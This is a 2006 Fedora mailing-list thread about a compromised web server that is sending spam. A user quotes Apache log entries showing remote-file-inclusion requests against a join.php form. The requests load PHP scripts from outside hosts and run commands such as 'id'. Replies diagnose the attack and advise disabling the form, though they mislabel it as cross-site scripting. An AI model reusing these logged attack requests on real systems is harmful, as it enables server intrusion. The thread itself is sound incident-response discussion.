Re: Postfix hit again (Spam)

On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 00:14:32 +0000
replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote:
i haven't been following this topic in great detail, but i suspect that
you have a form on your site that is being exploited for "form spam".
if you're not familiar with this, search google for "form spam".

- Rick


Rick,
Thank you, No, I have not heard of this.

I don't think that's what this is. Form spam takes advantage of
poorly-coded mail/contact forms and uses them to send mail to recipients
other than those intended by the form designer.

What's happening here is that the spammer is running their own code
(downloaded into /tmp) to send the mail, a rather more serious
situation.

Paul.

I might not know too much but I really think they are using my forms. I found
quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400]
"POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
HTTP/1.0" 200 5923

AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
HTTP/1.1" 200 2323

And the xpl.netmisphere2.com site has hacking information:
http://xpl.netmisphere2.com/ I think this outta be illegal!!

Looks like an exploit of a cross-site scripting vulnerability in your
join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
script that gets injected into your form, it's not an image at all.

You need to turn off that form until you can get a fixed version of that
application. And of course reinstall that system.

Paul.

--
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list

Relevant Pages

  • Re: Postfix hit again (Spam)
    ... Hash: SHA1 ... spam". ... Looks like an exploit of a cross-site scripting vulnerability in your ...
    (Fedora)
  • Re: Spamassassin+evolution: size?
    ... Hash: SHA1 ... It's somewhere in the documentation, ... > really large messages usually aren't spam anyway so you wouldn't gain ...
    (Debian-User)
  • Re: Postfix hit again (Spam)
    ... Hash: SHA1 ... you have a form on your site that is being exploited for "form spam". ... if you're not familiar with this, search google for "form spam". ...
    (Fedora)
  • Re: Man gets nine years for spamming
    ... Hash: SHA1 ... Clearly SPAM is more dangerous that destroying someones life. ...
    (alt.computer.security)
  • Re: I tried Spam hash
    ... I will add the chopped onions up ... front with the diced Spam instead of doing the onions separately, ... I actually did prefer it to corned beef hash. ... But, then, I'm white trash according to you, so I probably don't understand ...
    (rec.food.cooking)